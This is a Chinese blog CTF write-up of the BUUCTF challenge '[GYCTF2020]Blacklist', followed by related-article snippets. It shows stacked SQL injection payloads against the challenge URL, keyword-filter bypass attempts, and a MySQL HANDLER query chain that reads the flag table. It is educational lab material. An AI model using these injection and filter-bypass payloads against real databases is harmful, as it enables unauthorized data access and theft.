[GYCTF2020]Blacklist 1(详细做题过程)

最新推荐文章于 2023-12-01 11:59:11 发布
最新推荐文章于 2023-12-01 11:59:11 发布
阅读量1.8k 收藏 4
点赞数 7
分类专栏: CTF SQL注入 文章标签: sql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51927659/article/details/117233018
版权

[GYCTF2020]Blacklist 1(详细做题过程)

文章目录

1、考点

1、堆叠注入
2、 Handler语法

心得:学会新的姿势Handler的sql查询方法

2、解题过程

1、寻找注入点
http://3c6e5317-cd37-4cee-9e1f-7ffdea4f0191.node3.buuoj.cn/?inject=1'#

在这里插入图片描述

2、尝试堆叠注入

得到数据库的两张表

http://3c6e5317-cd37-4cee-9e1f-7ffdea4f0191.node3.buuoj.cn/?inject=1'; show tables; #

在这里插入图片描述

3、尝试联合注入

发现被过滤了很多内容

http://3c6e5317-cd37-4cee-9e1f-7ffdea4f0191.node3.buuoj.cn/?inject=1';select*from FlagHere;#

在这里插入图片描述

4、尝试双写绕过

还是被ban

http://3c6e5317-cd37-4cee-9e1f-7ffdea4f0191.node3.buuoj.cn/?inject=1';seselectlect*from FlagHere;#

在这里插入图片描述

5、尝试大小写绕过

依旧被ban

http://3c6e5317-cd37-4cee-9e1f-7ffdea4f0191.node3.buuoj.cn/?inject=1';SelEct*from FlagHere;#

在这里插入图片描述

6、传统方法行不通,看别人的wp中提到了Handler
http://3c6e5317-cd37-4cee-9e1f-7ffdea4f0191.node3.buuoj.cn/?inject=1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

cat flag

在这里插入图片描述

3、Handler语法

handler语句,一行一行的浏览一个表中的数据

handler语句并不具备select语句的所有功能。

mysql专用的语句,并没有包含到SQL标准中。
HANDLER语句提供通往表的直接通道的存储引擎接口,可以用于MyISAM和InnoDB表。

1、HANDLER tbl_name OPEN

打开一张表,无返回结果,实际上我们在这里声明了一个名为tb1_name的句柄。

2、HANDLER tbl_name READ FIRST

获取句柄的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。

3、HANDLER tbl_name CLOSE

关闭打开的句柄。

4、HANDLER tbl_name READ index_name = value

通过索引列指定一个值,可以指定从哪一行开始,通过NEXT继续浏览。

lunan0320
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
blacklist-jee
07-08
blacklist-jee 您将需要 Java8 来编译和运行。 检查您的应用程序是否正在运行 在安装了 git、java8、docker 和 maven 的本地 Ubuntu VM 中进行开发 先决条件:已安装 VirtualBox 和 Vagrant。 从该项目的根目录初始化并连接到 VM: $ vagrant up # grab yourself a coffee $ vagrant ssh 如果您需要在 VM 中安装更多工具,请将它们添加到vm-bootstrap.sh 。 构建和运行 Docker 容器 cd Docker docker build --rm -t blacklist . # grab yourself another coffee (only for the first run) docker run -d -p 8080:8080 -p 4848:
projeto-blacklist:作为MaxMilhas选择过程的一部分开发的项目
05-15
公积金黑名单咨询项目 该项目是MaxMilhas后端团队选择过程中开发的一部分。 入门 这些说明将指导您使用Docker创建虚拟项目服务器,并通过URL或表单使用API​​。 先决条件 安装了 ; 安装了 ; 项目结构 . projeto-blacklist |-- blacklist +-- consulta.php +-- incluir.php +-- remover.php +-- status.php |-- config +-- Conexao.php |-- controller +-- ServerController.php |-- db +-- db.sqlite3 |-- docker +-- Dockerfile |-- model +-- BlacklistModel.php +-
web buuctf [GYCTF2020]Blacklist1
weixin_44214568的博客
03-18 1101
考点:堆叠注入;mysql查询语句handler 1.进行注入测试: 注入1' 提示语法错误; 注入1' or '1=1'# 返回表数据,有回显,存在字符型可注入漏洞; 2.联合查询:1' union select 1# 回显过滤 3.根据过滤事项,应该是堆叠查询 a.1'; show tables;# b.1';show columns from FlagHere;# 4.因为存在较多的过滤,利用Mysql数据库中的查询语法handler mysql除可使用se..
buuctf-web-[GYCTF2020]Blacklist1
mlws1900的博客
08-11 351
MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句,并没有包含到SQL标准中。words表里有两个属性,即两列:id 和data,而FlagHere表里只有一个属性列,说明输入框可能查询的就是words表。换句话说我们没有办法像之前那样将 flaghere这个表改名为words(之前过一类似的)OPEN语句打开一个表。...
[GYCTF2020]Blacklist1
whale_waves的博客
11-07 87
其实这一我看到的第一反应是基于布尔的盲注 原因: 没有禁用ascii substr 之类的, 并且输入1和0时输入1会有回显0不会 这里将预编译注入、联合注入、报错注入、都过滤的干净 通过它给出的黑名单考虑可用的命令 可尝试的 堆叠注入例如show database和show tables handler命令 基于布尔的盲注(通过1^0^1,真假真为假,1^1^1,真真真为真,来手段) !!这里后面会排除掉,应为后面才想起来select被禁了,但是查询需要用
[GYCTF2020]Blacklist 1
m0_62879498的博客
04-28 2421
[GYCTF2020]Blacklist 1 在的时候,我们发现过滤掉了很多的关键字 很多注入方法已经没有办法使用(联合查询 布尔盲注 updataxml的报错注入) 并且发现本关的注入方法为 单引号 只能使用 堆叠注入 来进行查询查寻 库名 表名 1';show databases-- q 库名:supersqli 在这里 因为没有禁用 extractvalue 所以在这里我们可以构造出 extractvalue 报错注入 来查询库名 1' and (extractvalue(1,c
[GYCTF2020]Blacklist1 wp
qq_56301349的博客
11-26 68
MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。尝试进行联合注入获取列数和可以回显的信息,但是发现select被过滤,通过union select 测试得到过滤的关键字。首先,确定是否存在注入点,构造闭合的sql语句,payload:1' or '1'='1。本中过滤了关键字select,因此我们只能通过handler来打开表,并读取数据。
[GYCTF2020]Blacklist 1详解(handler命令用法!)
最新发布
m0_73734159的博客
12-01 801
果不其然改表名的两个关键命令被过滤了。select这个查询命令大家都很熟悉。但是我们却忽略了一个也很重要的角色。虽然handler这个命令不常见。那就是handler查询命令。存在FlagHere数据表。极有可能当中存在flag。rename和alter。包括查询命令也被过滤了。可知本是字符型注入。
buuctf-[GYCTF2020]Blacklist1(小宇特详解)
小宇的web博客
02-09 1578
buuctf-[GYCTF2020]Blacklist1(小宇特详解) 1.先看目是一道sql注入的目 先尝试进行闭合 payload:1’ 这里可以试出来是'来进行闭合即可 2.然后尝试着进行联合查询 发现是进行了过滤。 3.这里尝试着进行堆叠注入 payload:1’;show tables;# 4.查表 payload:1’; show columns from FlagHere;# 这里屏蔽了许多东西 5.这里由于rename,和alter被过滤了,这里考虑利用HANDLER语句 这里
blacklist:我们可以的作者和插件
05-05
监视清单 监视列表网站背后的数据,受samczsun的“”网站的启发。 此项目是由社区推动的,因此某些信息可能并非100%正确,但我们至少会在合并提交内容之前尝试对其进行验证。 请先阅读下面的贡献准则,然后再进行...
android_system_blacklist_android_msm8610_
10-03
msm8610 android system
ipset-blacklist:一个bash脚本,禁止在黑名单中发布大量IP地址
02-05
ipset-blacklist:一个bash脚本,禁止在黑名单中发布大量IP地址
DISCORD.JS-BlackList-UnBlackList:卸载清单DISCORD.JS BlackListUnBlackLis命令
02-18
:information: DISCORD.JS-BlackList-UnBlackLis 将清单中的内容输入到BlackList / UnBlackList命令中。 默西·德·莱塞尔 :star: (STAR)Si Vous L'avezutilisépour votre bot。 :laptop: 代码Voici评论进口商...
[GYCTF2020]EasyThinking
paidx0
04-29 1222
搜了一下thinkPHP6 的洞,看到一个可以RCE的洞,就赶紧试试 ThinkPHP 6.0.1 漏洞分析(任意文件操作) 利用方式大概就是首先 session文件的命名我们是可控的,通常是 sess_+ PHPSESSID 的值 命名的 注意:这里 PHPSESSID是32位 其次,会把提交的 key 写入到 session 文件,所以利用就是想办法把payload写到可控的session文件中 先注册个账号,然后抓登录的包,把 PHPSESSID改成 PHPSESSID=123456781234567
[GYCTF2020]Easyphp
b1ackc4t的博客
01-24 1984
知识点 反序列化pop链 反序列化字符逃逸 解过程 www.zip 备份文件获取源码 审计代码构造pop链 <?php Class UpdateHelper{ public $id; public $newinfo; public $sql; } class User { public $id; public $age; public $nickname; public function __toString() {
SSID blacklist
08-16
抱歉,我无法提供关于SSID黑名单的具体信息。SSID(Service Set Identifier)是用于识别无线网络的名称,黑名单则是指被禁止或限制使用的列表。黑名单可能是由网络管理员或设备制造商维护的,目的是限制某些无线网络的访问或防止潜在的安全威胁。具体的SSID黑名单可能因地区、组织或网络配置而异。如果您有特定的问或需求,请提供更多细节,我将尽力帮助您。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值